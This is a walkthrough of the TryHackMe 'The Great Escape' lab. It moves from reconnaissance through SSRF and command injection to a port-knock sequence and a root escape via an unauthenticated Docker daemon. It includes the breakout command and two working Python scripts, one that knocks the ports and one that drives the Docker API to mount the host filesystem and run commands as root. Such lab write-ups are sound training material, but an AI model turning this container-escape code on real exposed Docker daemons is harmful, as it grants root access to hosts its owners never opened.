TryHackMe {The Great Escape}

MrSnow
5 min read · Feb 26, 2021

Our devs have created an awesome new site. Can you break out of the sandbox?

Deploy the machine.

I added the machine IP to /etc/hosts with escape.thm as the hostname.

First things first, let's run an Nmap scan against the target machine.

Nmap:

nmap -sV -sC -A -T4 -p- -oN Nmap.txt 10.10.182.52

Nmap shows only two ports open, 22 and 80. Port 22 is reported as ‘ssh?’: the trailing question mark means the version probe got a response it could not match to any known fingerprint, so the service name is only a guess from the port number. That is odd for a stock SSH server.

The http-robots.txt script also reports that robots.txt has three disallowed entries. Let's look at port 80 first.

When we try to sign up, the site shows a warning: “Signups are currently disabled to prevent rouge accounts”. The Admin section brings up a login form. Let's try a default combination such as admin:password, which gives a 401 Unauthorized response.

I tried to brute-force the login form, and that didn't work.

Directory busting, the usual next step, didn't work either: the server answers non-existent paths with a 200, so gobuster aborts with its wildcard-response error instead of producing a usable list.

Lets check the robots.txt:

User-agent: *
Allow: /
Disallow: /api/
# Disallow: /exif-util
Disallow: /*.bak.txt$

Checking each entry in turn:

Content of /api/:

Content of /exif-util:

Note that the commented-out line in robots.txt still leaks the /exif-util path to anyone who reads the file. The /*.bak.txt pattern tells us there are backup files to hide; after trying the paths found so far with a .bak.txt suffix, the one that exists is exif-util.

Content of /exif-util.bak.txt:

Here we can spot something interesting at line 44 of the backup:

const response = await this.$axios.$get('http://api-dev-backup:8080/exif', {

This looks like a development backup of the front-end code, and it points at an internal backend, api-dev-backup:8080. That hostname presumably only resolves inside the application's own network and is not reachable from the outside directly.

During my testing I found that the From URL tab in /exif-util had an SSRF.

When I check the browser's developer tools I can see…

After trying several approaches, the one that worked was command injection: the URL we supply through the SSRF evidently ends up in a shell command on the backend. Some filtering of the input caused errors, so URL-encoding the injected command was needed to get it past the filter.

Through this injection we can see there is a git repository at /root/.git on the backend. Since our command does not run inside that directory, we pass --git-dir to git and read the log that way.

Here we can see a commit message saying a flag was added, in commit a3d30a7d0510dc6565ff9316e3fb84434916dee8.

So let's view that commit, injecting the same way:

git --git-dir /root/.git diff a3d30a7d0510dc6565ff9316e3fb84434916dee8

(git show with the same --git-dir and commit would display that commit's own change; diff compares it against the current working tree.)

Here we get a root flag, but not the actual root flag.

The commit we viewed also tells us to knock on ports 42, 1337, 10420, 6969 and 63000.

Port Knocking:

For port knocking we use netcat, hitting the ports in the order the commit gives. It doesn't matter that nothing answers on them: a knock daemon only watches for the connection attempts, so ‘connection refused’ on each is fine.

nc escape.thm 42
nc escape.thm 1337
nc escape.thm 10420
nc escape.thm 6969
nc escape.thm 63000

Running Nmap again, we see that port 2375 is now open. That is the Docker daemon's unencrypted remote API, which has no authentication of its own.
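The knock-and-recheck sequence above as a small Python script, added here as an example rather than taken from the original writeup. The hostname and port order come from the commit message and the /etc/hosts entry above; the delay and timeout values are my assumptions, and the final check only tests port 2375 instead of running the full Nmap rescan.

```python
"""Port-knock sequence followed by a check of the port that should appear.

Added example, not code from the original writeup. Host and knock order are
taken from the writeup; delay/timeout values are assumptions.
"""
import socket
import time

KNOCK_HOST = "escape.thm"                          # /etc/hosts entry from the writeup
KNOCK_SEQUENCE = (42, 1337, 10420, 6969, 63000)    # order given in the commit message
DOCKER_PORT = 2375                                 # opens after the knock, per the writeup


def knock(host, ports, delay=0.2, timeout=1.0):
    """Send one TCP connection attempt to each port, in order.

    A knock daemon watches the incoming SYNs, so it does not matter that nothing
    is listening: a refused or timed-out connection still counts as a knock.
    Returns the ports that were knocked, in the order sent.
    """
    knocked = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:
                pass  # refused/filtered is expected; the SYN has already gone out
        knocked.append(port)
        # Knock daemons usually require the whole sequence within a few seconds,
        # so keep the gap between knocks short.
        time.sleep(delay)
    return knocked


def port_open(host, port, timeout=2.0):
    """True if a TCP connection to host:port succeeds."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


if __name__ == "__main__":
    sent = knock(KNOCK_HOST, KNOCK_SEQUENCE)
    print(f"knocked: {sent}")
    # The full Nmap rescan from the writeup is the thorough option; this is the quick check.
    print(f"port {DOCKER_PORT} open: {port_open(KNOCK_HOST, DOCKER_PORT)}")
```

If the port does not appear, the usual culprits are order (the sequence is positional) and timing (too slow between knocks, or a previous partial sequence still pending), not the refused connections themselves.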

With the Docker API reachable, let's enumerate the images present on the daemon.

Anyone who can talk to an unauthenticated Docker daemon is effectively root on the host, because they can start a container with the host's root filesystem mounted inside it. That is what we do next; any image already on the daemon will do, so let's use the nginx image.

docker -H escape.thm:2375 run -v /:/mnt --rm -it nginx chroot /mnt sh

-H: the remote daemon to talk to, <host>:<port> (escape.thm:2375)
-v /:/mnt: bind-mount the host's root filesystem at /mnt inside the container
--rm: remove the container when the shell exits
-it: interactive mode with a TTY
chroot /mnt: make the mounted host filesystem the root of the process
sh: the shell to run inside it
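The same breakout spoken directly to the Docker Engine REST API, as an added example (not the command from the original writeup), for the case where no docker CLI is at hand. It creates a container from the nginx image with the host's / bound at /mnt, runs a command through chroot /mnt, and reads the result back from the daemon's log stream. The daemon address is the one from the writeup; the command executed inside the container (id and the host's /etc/hostname) is an assumption chosen only to prove we are looking at the host's filesystem.

```python
"""Docker Engine API equivalent of
   docker -H escape.thm:2375 run -v /:/mnt --rm nginx chroot /mnt <cmd>

Added example, not the writeup's own command. The daemon address is from the
writeup; the command run inside the container is an assumption for illustration.
"""
import json
import struct
import urllib.request

DOCKER_API = "http://escape.thm:2375"   # unauthenticated daemon found after the knock


def create_payload(image="nginx", cmd=("chroot", "/mnt", "sh", "-c", "id; cat /etc/hostname")):
    """Body for POST /containers/create: host / bind-mounted at /mnt, no TTY so
    the output comes back as a multiplexed stdout/stderr log stream."""
    return {
        "Image": image,
        "Cmd": list(cmd),
        "Tty": False,
        "HostConfig": {"Binds": ["/:/mnt"]},   # the -v /:/mnt of the CLI command
    }


def demux_log_stream(data):
    """Split Docker's framed log stream into (stdout, stderr).

    Without a TTY each frame is: 1 byte stream type (1 = stdout, 2 = stderr),
    3 zero bytes, a 4-byte big-endian payload length, then the payload.
    """
    out, err = bytearray(), bytearray()
    pos = 0
    while pos + 8 <= len(data):
        stream_type = data[pos]
        size = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        chunk = data[pos + 8:pos + 8 + size]
        (out if stream_type == 1 else err).extend(chunk)
        pos += 8 + size
    return bytes(out), bytes(err)


def _api(method, path, body=None):
    """One request to the daemon; returns the raw response body."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(DOCKER_API + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()


def run_on_host(cmd):
    """create -> start -> wait -> logs -> delete; returns the command's stdout."""
    cid = json.loads(_api("POST", "/containers/create", create_payload(cmd=cmd)))["Id"]
    try:
        _api("POST", f"/containers/{cid}/start")
        _api("POST", f"/containers/{cid}/wait")            # block until the command exits
        raw = _api("GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
        stdout, _stderr = demux_log_stream(raw)
    finally:
        _api("DELETE", f"/containers/{cid}?force=1")       # the --rm of the CLI command
    return stdout.decode(errors="replace")


if __name__ == "__main__":
    print(run_on_host(("chroot", "/mnt", "sh", "-c", "id; cat /etc/hostname")))
```

The frame demultiplexing in demux_log_stream is the part people usually get wrong: with Tty false the daemon interleaves stdout and stderr in one stream, each chunk prefixed by a type byte and a big-endian length, so reading the body as plain text leaves binary header bytes in the output. The defensive lesson is the one the room teaches: a daemon listening on 2375 without TLS client authentication is root on the host for anyone who can reach the port, so it belongs on the unix socket only, or on 2376 with tlsverify and client certificates.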

We get a shell in which the host's filesystem is the root. If the shell is not stable, use

Now let's find the flag.

And this is the real root flag. Now let's find the first flag, which is in the web app. The hint for the first flag is:

‘Some well known files may offer some help’

Since docker-compose is used to build the containers, let's look for its files on the host.

There is a folder named front inside the docker-escape-compose folder.

Inside it is a folder named dist with a number of files and folders, among them a directory named ‘.well-known’.

Inside .well-known there is a file named ‘security.txt’. Its contents say:

'Ping /api/fl46 with a HEAD request for a nifty treat.'

So let's send a HEAD request with curl. A HEAD response carries no body, so whatever the endpoint wants to tell us has to be in the response headers, which is why an ordinary browser visit to the path would miss it.

We got the last flag. That's it.
